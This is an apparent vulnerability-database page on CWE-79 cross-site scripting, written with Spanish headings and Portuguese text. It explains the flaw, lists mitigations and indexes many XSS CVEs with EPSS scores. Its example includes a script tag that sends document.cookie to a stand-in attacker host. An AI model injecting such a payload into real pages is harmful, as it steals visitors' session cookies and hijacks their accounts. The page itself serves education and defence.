Fallos del tipo CWE-79

28.459 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-43686MEDIUMReflected XSS in TimeProvider 4100 chart componentEPSS 13.0%CVE-2025-62411MEDIUMStored XSS in Alert Transport name field in LibreNMSEPSS 12.7%CVE-2025-55296MEDIUMLibreNMS allows stored XSS in Alert Template name fieldEPSS 12.5%CVE-2021-38488MEDIUMDelta Electronics DIALinkEPSS 12.3%CVE-2021-21799CRITICALCross-site scripting vulnerabilities exist in the telnet_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a useEPSS 12.3%CVE-2015-6477MEDIUMMultiple cross-site scripting (XSS) vulnerabilities in the Wind Farm Portal application in Nordex Control 2 (NC2) SCADA 16 and earlier allowEPSS 12.0%CVE-2024-34051MEDIUMA Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attaEPSS 12.0%CVE-2025-47931LOWLibreNMS stored Cross-site Scripting vulnerability in poller group nameEPSS 11.9%CVE-2023-23383HIGHService Fabric Explorer Spoofing VulnerabilityEPSS 11.7%CVE-2021-33179—The general user interface in Nagios XI versions prior to 5.8.4 is vulnerable to authenticated reflected cross-site scripting. An authenticaEPSS 11.7%CVE-2021-38428MEDIUMDelta Electronics DIALinkEPSS 11.4%CVE-2021-24488—Post Grid < 2.1.8 - Reflected Cross-Site Scripting (XSS)EPSS 11.2%CVE-2023-29772MEDIUMA Cross-site scripting (XSS) vulnerability in the System Log/General Log page of the administrator web UI in ASUS RT-AC51U wireless router fEPSS 11.2%CVE-2022-40965HIGHDelta Electronics DIAEnergieEPSS 11.1%CVE-2022-41555HIGHDelta Electronics DIAEnergieEPSS 11.1%CVE-2022-41701HIGHDelta Electronics DIAEnergieEPSS 11.1%CVE-2022-41702HIGHDelta Electronics DIAEnergieEPSS 11.1%CVE-2022-41651HIGHDelta Electronics DIAEnergieEPSS 11.1%CVE-2022-35698CRITICALAdobe Commerce Stored XSS Arbitrary code executionEPSS 10.9%CVE-2021-24320—Bello < 1.6.0 - Unauthenticated Reflected XSS & XFSEPSS 10.8%